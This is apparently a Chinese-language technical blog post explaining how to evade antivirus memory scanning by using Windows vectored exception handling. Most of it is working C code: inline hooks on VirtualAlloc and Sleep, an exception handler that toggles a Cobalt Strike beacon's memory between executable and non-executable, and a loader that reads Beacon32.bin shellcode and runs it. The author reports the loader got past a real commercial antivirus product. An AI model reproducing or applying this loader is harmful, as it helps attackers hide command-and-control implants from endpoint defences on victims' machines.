实战 | 通过VEH异常处理规避内存扫描实现免杀
windows异常处理
Windows中主要的异常处理机制:VEH、SEH、C++EH。
SEH中文全称:结构化异常处理。就是平时用的__try __finally __try __except,是对c的扩展。
VEH中文全称:向量异常处理。一般来说用AddVectoredExceptionHandler去添加一个异常处理函数,可以通过第一个参数决定是否将VEH函数插入到VEH链表头,插入到链表头的函数先执行,如果为1,则会最优先执行。
C++EH是C++提供的异常处理方式,执行顺序将排在最后。
在用户模式下发生异常时,异常处理分发函数在内部会先调用遍历 VEH 记录链表的函数, 如果没有找到可以处理异常的注册函数,再开始遍历 SEH 注册链表。
Windows异常处理顺序流程
•终止当前程序的执行•调试器(进程必须被调试,向调试器发送EXCEPTION_DEBUG_EVENT消息)•执行VEH•执行SEH•TopLevelEH(进程被调试时不会被执行)•执行VEH•交给调试器(上面的异常处理都说处理不了,就再次交给调试器)•调用异常端口通知csrss.exe
通过流程也可以看到VEH的执行顺序是要优于SEH的。
通过VEH异常处理规避内存扫描
当AV描扫进程空间的时候,并不会将所有的内存空间都扫描一遍,只会扫描敏感的内存区域。
所谓的敏感内存区域无非就是指可执行的区域。思路就是不断地改变某一块内存属性,当应该执行命令或者某些操作的时候,执行的内存属性是可执行的,当功能模块进入睡眠的时候则将内存属性改为不可执行。
当执行的地址空间为不可执行时,若强行执行则会返回0xc0000005异常,这个异常是指没有权限执行。所以通过VEH抓取这个异常,即可根据需求,动态的改变内存属性,进而逃避内存扫描。
当触发0xc0000005异常的时候需要恢复内存可执行属性,就通过AddVectoredExceptionHandler去注册一个异常处理函数,作用就是更改内存属性为可执行。那么就需要知道是哪一块地址需要修改,这里要根据申请空间API决定,如果是VirtualAlloc就hook VirtualAlloc,如果是其他申请空间API就hook其他API,这个根据具体的c2profile配置有关。如果不使用c2profile那么默认就是使用VirtualAlloc分配空间。这里先看一下hook VirtualAlloc,作用主要是为了读取起始地址和大小。
static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
unhookVirtualAlloc();
Beacon_len = dwSize;
Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
hookVirtualAlloc();
printf("分配大小:%d", Beacon_len);
printf("分配地址:%x \n", Beacon_address);
return Beacon_address;
}
void hookVirtualAlloc() {
DWORD dwAllocOldProtect = NULL;
BYTE pAllocData[5] = { 0xe9,0x0,0x0,0x0,0x0 };
//保存原来的硬编码
RtlCopyMemory(g_OldAlloc, OldVirtualAlloc, sizeof(pAllocData));
//计算偏移
DWORD dwAllocOffeset = (DWORD)NewVirtualAlloc - (DWORD)OldVirtualAlloc - 5;
//得到完整的pAllocData
RtlCopyMemory(&pAllocData[1], &dwAllocOffeset, sizeof(dwAllocOffeset));
//改为可写属性
VirtualProtect(OldVirtualAlloc, 5, PAGE_READWRITE, &dwAllocOldProtect);
//将偏移地址写入,跳转到新的
RtlCopyMemory(OldVirtualAlloc, pAllocData, sizeof(pAllocData));
//还原属性
VirtualProtect(OldVirtualAlloc, 5, dwAllocOldProtect, &dwAllocOldProtect);
}
void unhookVirtualAlloc() {
DWORD dwOldProtect = NULL;
VirtualProtect(OldVirtualAlloc, 5, PAGE_READWRITE, &dwOldProtect);
//还原硬编码
RtlCopyMemory(OldVirtualAlloc, g_OldAlloc, sizeof(g_OldAlloc));
//还原属性
VirtualProtect(OldVirtualAlloc, 5, dwOldProtect, &dwOldProtect);
}还有一个需要去hook的就是Sleep,因为需要在执行Sleep的时候就将功能模块的内存属性改为不可执行,规避内存扫描。
static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;
void WINAPI NewSleep(DWORD dwMilliseconds) {
if (Vir_FLAG)
{
VirtualFree(shellcode_addr, 0, MEM_RELEASE);
Vir_FLAG = false;
}
printf("sleep时间:%d\n", dwMilliseconds);
unhookSleep();
OldSleep(dwMilliseconds);
hookSleep();
//解锁
SetEvent(hEvent);
}
void hookSleep() {
DWORD dwSleepOldProtect = NULL;
BYTE pSleepData[5] = { 0xe9,0x0,0x0,0x0,0x0 };
//保存原来的硬编码
RtlCopyMemory(g_OldSleep, OldSleep, sizeof(pSleepData));
//计算偏移
DWORD dwSleepOffeset = (DWORD)NewSleep - (DWORD)OldSleep - 5;
//得到完整的pAllocData
RtlCopyMemory(&pSleepData[1], &dwSleepOffeset, sizeof(dwSleepOffeset));
//改为可写属性
VirtualProtect(OldSleep, 5, PAGE_EXECUTE_READWRITE, &dwSleepOldProtect);
//将偏移地址写入,跳转到新的
RtlCopyMemory(OldSleep, pSleepData, sizeof(pSleepData));
//还原属性
VirtualProtect(OldSleep, 5, dwSleepOldProtect, &dwSleepOldProtect);
}
void unhookSleep() {
DWORD dwOldProtect = NULL;
VirtualProtect(OldSleep, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
//还原硬编码
RtlCopyMemory(OldSleep, g_OldSleep, sizeof(g_OldSleep));
//还原属性
VirtualProtect(OldSleep, 5, dwOldProtect, &dwOldProtect);
}然后就是注册异常函数,这个异常函数就是为了恢复可执行内存属性。
is_Exception函数就是为了验证是不是在申请空间内的范围呢出现异常,而不是其他内存空间。
LONG NTAPI PvectoredExceptionHandler(PEXCEPTION_POINTERS ExceptionInfo){
printf("异常错误码:%x\n", ExceptionInfo->ExceptionRecord->ExceptionCode);
printf("线程地址:%lx\n", ExceptionInfo->ContextRecord->Eip);
if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(ExceptionInfo->ContextRecord->Eip) {
printf("恢复可执行内存属性");
VirtualProtect(Beacon_address, Beacon_len, PAGE_EXECUTE_READWRITE, &Beacon_flOldProtect);
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}起一个线程,让他不断地去等待Sleep函数通知,通知后就将内存空间重新设置为不可执行。线程控制的话就用到了事件。
DWORD WINAPI SetNoExecutable(LPVOID lpParameter) {
while (true)
{
//等待解锁
WaitForSingleObject(hEvent, INFINITE);
printf("设置Beacon内存属性不可执行\n");
VirtualProtect(Beacon_address, Beacon_len, PAGE_READWRITE, &Beacon_flOldProtect);
//设置事件为未被通知的,重新上锁
ResetEvent(hEvent);
}
}
int main()
{
//设置事件为有信号的,处于通知状态。
hEvent = CreateEvent(NULL,TRUE,false,NULL);
AddVectoredExceptionHandler(1, &PvectoredExceptionHandler);
hookVirtualAlloc();
hookSleep();
unsigned char* BinData = NULL;
size_t size = 0;
char* szFilePath = (char*)"Beacon32.bin";
BinData = ReadBinaryFile(szFilePath, &size);
shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
memcpy(shellcode_addr, BinData, size);
VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_flOldProtect);
HANDLE hThread1 = CreateThread(NULL, 0, SetNoExecutable, NULL, 0, NULL);
CloseHandle(hThread1);
(*(int(*)()) shellcode_addr)();
}这里有一个很混淆的地方:hook VirtualAlloc并不是去hook的上面这个我们自己调用的VirtualAlloc,这个是没有意义的。hook的是cs自己调用的申请内存空间API,他自己分配的内存地址才是真正的beacon代码地址,这里用下LN师傅的图。图中是stager分阶段的执行过程,如果是stagerless无阶段的执行过程也是差不多的,只不过没有远程去请求而是直接写在文件里。而且他这个执行步骤是会将前面的代码删除的,比如说
比如生成一个无阶段的raw文件,然后跑一下
会发现这里调用了两次VirtualAlloc,实际上就是执行cs的代码他自己会调用一次,这个地址才是真正的beacon代码实现功能的地址,我们要改的内存属性其实在这里。
还可以看到他cs是执行完一段代码,就释放一段空间。
执行前:
执行后:
他把之前部分内存已经free掉了。
最后,找了个同学的物理机数字杀软去看了下,上线是完全没有问题的。(cs上线的图当时忘了截,基础命令可以执行)
这里是实际环境下的数字杀软,并不是虚拟机版本,杀毒力度是很强的,即便他认为内存空间没有问题,但是当我执行敏感操作,比如远程创建线程,他还是会直接弹出警告。所以即便已经把对抗做到内存,但是还是处处受限,上线只是一方面,能执行各种操作是另一方面,像LN前辈说的一样,可能只有加白才是最后的归宿。
写在最后
这个思路是学习@WBGlIl师傅的思路,在今年5月份的时候读到了他的文章,但是当时看不懂,基础知识比较薄弱。现在有了些基础知识后就想着尝试去理解大佬的思路。文章中如果有说错了地方也请师傅们指出。
腾讯云开发者
